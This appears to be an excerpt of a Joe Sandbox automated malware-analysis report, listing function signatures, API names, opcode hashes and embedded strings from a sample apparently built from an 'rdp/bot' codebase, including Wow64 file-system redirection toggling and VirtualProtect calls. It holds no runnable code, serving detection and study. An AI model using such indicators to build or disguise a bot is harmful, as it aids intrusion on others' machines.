                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fwprintf$strlen
                                                      • String ID: %*.*S$%-*.*S$%.*S
                                                      • API String ID: 2636243462-2115465065
                                                      • Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                                                      • Instruction ID: a4354395e206fe4369be275a7b913da9a8ba84197bd498aeb65bb524a5a0415b
                                                      • Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                                                      • Instruction Fuzzy Hash: 7331D462E58246C7EF508F29964057862B1EB6EBA4F648131FD0DCF789DE2DE8008F48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastLibraryLoadProc
                                                      • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                                      • API String ID: 3511525774-1584720945
                                                      • Opcode ID: 0d72eef9973f73162af86764223cfd8feda96ec3c76fb34f3754d22987ee77a7
                                                      • Instruction ID: 458cf73a1137afc00a402dffdc26a3fc97e64c59a67eb6c7f08b535e74be8a98
                                                      • Opcode Fuzzy Hash: 0d72eef9973f73162af86764223cfd8feda96ec3c76fb34f3754d22987ee77a7
                                                      • Instruction Fuzzy Hash: 8F11BA60E5D647E2FF559B19AA993B81270AF7B344F440035F40DCE2A1EEADE548C718
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                                      • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                                      • API String ID: 1533789296-1853374401
                                                      • Opcode ID: 9122182cffd4728d3c90ecec1273d3d87b598eef96ed82746b470995d4617c28
                                                      • Instruction ID: 7afb51d57aa6a46ef12ec263d8d982ce05567474ff7d1b5695e7b8a5e97d2ff8
                                                      • Opcode Fuzzy Hash: 9122182cffd4728d3c90ecec1273d3d87b598eef96ed82746b470995d4617c28
                                                      • Instruction Fuzzy Hash: AB019B60E59943E3FE519B19AAD53B81270AF3E304F444436F40DCE2A1EFADE5498708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                                                      • API String ID: 2962429428-1801624891
                                                      • Opcode ID: 0fb7cf508a06238d52d9bb688028082a26fb40906e283302dad5f6b1aff35725
                                                      • Instruction ID: 619523ab917abead5d03a87fc3fb148186711fcd63a9a6c2ef57556ce7bfa261
                                                      • Opcode Fuzzy Hash: 0fb7cf508a06238d52d9bb688028082a26fb40906e283302dad5f6b1aff35725
                                                      • Instruction Fuzzy Hash: 53F01C61E5984BC1EE10DB69EEA01A82774FF6A748F540132E90D8F260EE3CD946C308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: DeviceErrorLastQuery
                                                      • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
                                                      • API String ID: 963133057-3473575966
                                                      • Opcode ID: 514efc25f0c4eb172a5ba01c37f348038fb82fcf658263998647200fcf2634be
                                                      • Instruction ID: 184a12214e35ed28f0599fbdbeb1d60822fd2c48392bf060c1ee02947b484c6f
                                                      • Opcode Fuzzy Hash: 514efc25f0c4eb172a5ba01c37f348038fb82fcf658263998647200fcf2634be
                                                      • Instruction Fuzzy Hash: 93419F12E4C5B6C3FE30661CE6803B95275DF6A754F150032F98E9F2CDDEADAD808289
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fwprintf
                                                      • String ID: %*.*s$%-*.*s$%.*s$%S%S
                                                      • API String ID: 968622242-2451587232
                                                      • Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                                                      • Instruction ID: ce0872a376569b2e9bc73c55c91d091e9b8ad23104b51d504ac75d01653473de
                                                      • Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                                                      • Instruction Fuzzy Hash: F831B872F58503C7EB604E2D86045786AB0EF6EB94F04C131E95DEF699DD2CE8008F48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CriticalDeleteSectionfclose
                                                      • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                      • API String ID: 3387974148-4247581856
                                                      • Opcode ID: 0acbfdf3f8d6d1efa466a815d7992c440d0eef6fdb26f5ce6430468d6735f68e
                                                      • Instruction ID: 881e3e0c74c691f9054f5fd95b34979a4ede53499f2688a1edfc2b6ca81c0967
                                                      • Opcode Fuzzy Hash: 0acbfdf3f8d6d1efa466a815d7992c440d0eef6fdb26f5ce6430468d6735f68e
                                                      • Instruction Fuzzy Hash: 4BF01760E49603C5FA849B58EAE43B52370AF7F704F880835E00DDE2A0CF3CA049CB48
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,00007FF66EBBA1E8,00000000,?,?,?,00007FF66EBBA1E0,00007FF66EBA1208,?,?,?,00007FF66EBA1313), ref: 00007FF66EBAABC2
                                                      Strings
                                                      • Unknown pseudo relocation protocol version %d., xrefs: 00007FF66EBAAA62
                                                      • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF66EBAAB5D
                                                      • Unknown pseudo relocation bit size %d., xrefs: 00007FF66EBAAAEB
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                      • API String ID: 544645111-1286557213
                                                      • Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                                                      • Instruction ID: 5f02b1710b516c98376b64fb3703f217a2cb46da572a50fa67bbcd07d4bbc526
                                                      • Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                                                      • Instruction Fuzzy Hash: 06619061F58502C6EF208F19D78027823B1EB6EB94F048135EA1D8B7D9DE3DE581CB68
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandleLastModule
                                                      • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                                      • API String ID: 4242514867-2427012484
                                                      • Opcode ID: 81f36c89b860097b05460252ebfded9543c35cc1d90868fc212eea5c328d93e8
                                                      • Instruction ID: 47546a2d0b32c6765622b1a464eb35d5a048f519108957aad576e7ce9bba287d
                                                      • Opcode Fuzzy Hash: 81f36c89b860097b05460252ebfded9543c35cc1d90868fc212eea5c328d93e8
                                                      • Instruction Fuzzy Hash: 2BF03064E08602D1EB709B58E5C03AA2774EB6A798F880135E54D8A6B4CE6CD24DC719
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Byte$CharMultiWide$Lead_errno
                                                      • String ID:
                                                      • API String ID: 2766522060-0
                                                      • Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                                                      • Instruction ID: 0f0e024d3f3e107d15843bead8219fa96ba20b0d24438e78316d58a55f6b6587
                                                      • Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                                                      • Instruction Fuzzy Hash: 1E318472E0C681C9E7744F21D7C03796AB0ABAA788F044135FA998B7D5EE7CD5498708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: signal
                                                      • String ID: CCG
                                                      • API String ID: 1946981877-1584390748
                                                      • Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                                                      • Instruction ID: 7d662b7ac5a0db78fb038af22a2b9c9b506662f9f8c6212ea9771f9be07676bd
                                                      • Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                                                      • Instruction Fuzzy Hash: A9218221E8D507C7FE6442188B9137911A2DF6F721F244935E98DCF2D1ED1CB8815A29
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                                      • Instruction ID: 05ce6182a68ca4a5224b1bfd9fa70964b5469b1b3385f698dfa64a71f72ddac7
                                                      • Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                                      • Instruction Fuzzy Hash: C4115162D08E84C2D6118F1CE0413EAB370FFAE359F605326FBC85A264DF3AD5568B04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-4064033741
                                                      • Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                                      • Instruction ID: b43eda6e674750193cff056772be4b082ed1d416914597c20582f0dd81efec65
                                                      • Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                                      • Instruction Fuzzy Hash: 31F01266808F84C2D6118F1CE5402ABB370FFAF789F605326FBC96A624DF2DD5428B04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-2713391170
                                                      • Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                                      • Instruction ID: 967e24b58a7456a5e0f1b95247380947a9d9d0c9e5cf67276b2c328448d3f787
                                                      • Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                                      • Instruction Fuzzy Hash: F6F01266808F84C2D6118F1CE4402ABB374FFAF789F605326FBC96A664DF2DD5468704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-4273532761
                                                      • Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                                      • Instruction ID: caa382143d3361c4245e9e2b4896deaefaf3246335e93b10c8dbf7f9b27016b5
                                                      • Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                                      • Instruction Fuzzy Hash: F4F01266808F84C2D6118F1CE4402ABB370FFAF789F605326FBC96A664DF2DD5428704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-4283191376
                                                      • Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                                      • Instruction ID: 4177d13d62f514cc4f0a7f4a4ecb46fed58e0070528291ba7addab7899fb0f4e
                                                      • Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                                      • Instruction Fuzzy Hash: DEF01266808F84C2D6118F1CE5402ABB370FFAF789F605326FBC96A624DF2DD5428B04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-2187435201
                                                      • Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                                      • Instruction ID: 6346c167a6da0cafee369ccb1a08dbb498d25509d0665c2e6b85e0467c51741b
                                                      • Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                                      • Instruction Fuzzy Hash: 68F0FF66808F84C2D6118F18A4402ABB370FFAE789F605326FBC96A624DF2DD5428704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
